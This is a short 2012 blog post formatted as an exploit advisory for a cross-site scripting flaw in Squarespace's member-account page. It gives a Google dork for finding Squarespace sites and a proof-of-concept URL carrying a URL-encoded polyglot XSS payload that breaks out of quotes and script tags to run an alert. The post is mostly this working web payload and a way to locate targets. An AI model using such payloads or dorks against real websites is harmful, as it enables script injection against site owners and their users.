duminică, 26 februarie 2012

Squarespace Cross Site Scripting

# Exploit Title: Squarespace Cross Site Scripting
# Date: 26.02.2012
# Author: Sony
# Software Link: http://www.squarespace.com/
# Google Dorks: powered by squarespace site:edu (or org or com or what you want)
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/squarespace-cross-site-scripting.html
..................................................................

What is Squarespace?

http://en.wikipedia.org/wiki/Squarespace
http://blog-software-review.toptenreviews.com/

We have xss in the Squarespace.

But we can see this only after "member login"..

(other site)


(my site)

http://sonystyles.squarespace.com/display/configuration/CreateOrModifyMemberAccount?accountId=2095672%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

Publicat de Sony la 03:10
Etichete: ,

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.